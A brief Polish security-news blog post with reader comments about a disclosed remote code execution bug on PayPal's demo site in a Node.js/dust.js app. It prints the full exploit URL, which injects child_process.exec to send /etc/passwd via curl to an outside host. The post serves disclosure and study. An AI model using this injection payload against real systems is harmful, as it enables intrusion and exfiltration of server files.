Preorder drugiego tomu książki sekuraka: Wprowadzenie do bezpieczeństwa IT. -15% z kodem: sekurak-book

Node.js – wykonanie kodu w OS na serwerze Paypala

20 sierpnia 2016, 10:20 | W biegu | komentarze 3
Tagi: ,

O problemach bezpieczeństwa w node.js pisaliśmy już jakiś czas temu. Teraz świeży bug umożliwiający wykonanie kodu w os na demo.paypal.com.

Tym razem udało się znaleźć problem przy okazji fuzzingu w burpie:

tee

Finalnie exploit okazał się w miarę prosty (wysłanie /etc/passwd do serwera atakującego):

https://demo.paypal.com/demo/navigation?device[]=x&device[]=y’-require(’child_process’).exec(’curl+-F+”x=`cat+/etc/passwd`”+artsploit.com’)-’

–Michał Sajdak

Spodobał Ci się wpis? Podziel się nim ze znajomymi:



Komentarze

  1. heliar

    Ależ Monsieur – proszę zaprzestać! Znów nie będę w stanie za VPSa zapłacić jak zepsujecie paypal’a… ;)

    Odpowiedz
    • zero one

      He he :D
      Pzdr.

      Odpowiedz
  2. Łukasz

    No dobra, ale to nie jest exploit w node.js tylko w dust.js. Trochę jakby napisać headline, że exploit w PHP, bo ktoś znalazł dziurę w Code Igniter…

    Odpowiedz

Odpowiedz